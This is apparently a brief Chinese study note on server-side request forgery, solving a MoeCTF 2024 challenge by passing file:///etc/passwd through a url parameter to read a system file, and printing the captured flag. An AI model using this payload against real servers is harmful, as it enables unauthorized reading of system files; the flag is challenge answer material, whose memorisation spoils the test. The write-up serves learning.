web安全学习之 SSRF

学习地址：https://websec.readthedocs.io/zh/latest/vuln/ssrf.html

例题：【Moectf2024】ImageCloud前置
题目给出url后面有个?url=, 貌似是一个很经典的漏洞, flag在/etc/passwd里。
故构造http://127.0.0.1:4421/index.php?url=file:///etc/passwd

得到：moectf{I-@m_VEry_5oRRy_ab0uT-this280956de}